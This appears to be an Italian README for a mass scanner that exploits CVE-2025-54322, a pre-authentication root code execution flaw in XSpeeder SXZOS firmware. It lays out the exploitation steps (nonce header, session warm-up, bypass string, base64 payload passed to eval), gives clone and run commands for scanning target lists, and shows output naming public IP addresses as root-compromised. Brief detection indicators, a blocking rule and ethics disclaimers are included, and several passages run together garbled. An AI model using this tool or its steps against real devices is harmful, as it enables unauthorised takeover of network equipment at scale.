
CVE-2025-54322 - XSpeeder SXZOS Pre-Auth RCE 0day Finder Quick
Uno scanner di vulnerabilità multithread per CVE-2025-54322, una vulnerabilità di esecuzione remota di codice non autenticata nel firmware XSpeeder SXZOS che interessa circa 70.000+ host in tutto il mondo.
CVE-2025-54322 è una vulnerabilità critica di esecuzione remota di codice pre-autenticazione scoperta nel firmware XSpeeder SXZOS, che alimenta dispositivi SD-WAN, router e apparecchiature di rete perimetrale.
La vulnerabilità risiede nell'interfaccia web basata su Django del firmware SXZOS:
/?title=ABC&oIp=XXX&chkid=[base64_payload]eval() di Python su input utente decodificato in base641. Calcola il nonce basato sul tempo per l'header X-SXZ-R
2. Riscalda la sessione tramite l'endpoint /webInfos/
3. Crea un payload malevolo con la stringa di bypass (#sUserCodexsPwd)
4. Codifica in Base64 il payload
5. Invia l'exploit con esattamente 3 parametri di query
6. Il server decodifica e valuta il payload
7. I comandi vengono eseguiti con privilegi di root
L'exploit bypassa molteplici livelli di difesa:
SXZ/2.3X-SXZ-R: [0-6]/webInfos/#sUserCodexsPwdvuln-confirm.txt immediatamente# Clona il repository
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# Installa le dipendenze richieste
pip install -r requirements.txt
Crea un file requirements.txt:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# Scansione con numero di thread personalizzato (default: 10)
python3 scanner.py targets.txt 20
# Scansione con il massimo di thread per risultati più veloci
python3 scanner.py targets.txt 50
# Scansione con numero di thread conservativo
python3 scanner.py targets.txt 5
Crea un file targets.txt con un target per riga:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...
======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================
[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable
======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================
Lo scanner mostra:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds
Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.
Se scopri sistemi vulnerabili:
Se gestisci dispositivi XSpeeder SXZOS:
Cerca questi indicatori nei log:
/?title=*&oIp=*&chkid=* con payload base64SXZ/2.3X-SXZ-R anomali#sUserCodexsPwd/webInfos/ seguite dal percorso root# Regola Nginx per bloccare i tentativi di sfruttamento
location / {
if ($args ~* "chkid=") {
return 403;
}
}
Questa vulnerabilità è stata scoperta autonomamente da pwn.ai - una piattaforma di ricerca sulla sicurezza basata sull'IA.
Nota importante: Questa è la prima vulnerabilità zero-day RCE remotamente sfruttabile scoperta da un agente IA documentata pubblicamente.
Chirag Artani
Questo scanner è stato creato per assistere i professionisti della sicurezza in:
Questo progetto è concesso in licenza con la licenza MIT - vedere il file LICENSE per i dettagli.
I contributi sono benvenuti! Sentiti libero di inviare una Pull Request.
Per domande, problemi o suggerimenti:
Ricorda: Da un grande potere derivano grandi responsabilità. Utilizza questo strumento in modo etico e legale.
Rimani al sicuro. Rimani etico. Rimani legale.
| Campo | Valore |
|---|
| ID CVE | CVE-2025-54322 |
| Fornitore | XSpeeder (vendor cinese di networking) |
| Prodotto interessato | Firmware SXZOS |
| Tipo di vulnerabilità | Esecuzione remota di codice pre-autenticazione (RCE) |
| Punteggio CVSS | 9.8+ (Critico) |
| Vettore di attacco | Rete |
| Privilegi richiesti | Nessuno |
| Interazione utente | Nessuna |
| Impatto | Compromissione completa del sistema con privilegi di root |
| Numero di target | Thread consigliati | Tempo previsto |
|---|
| 1-10 | 5 thread | ~1-2 min |
| 10-50 | 10 thread | ~3-5 min |
| 50-100 | 20 thread | ~5-10 min |
| 100-500 | 30 thread | ~10-20 min |
| 500+ | 40-50 thread | ~20+ min |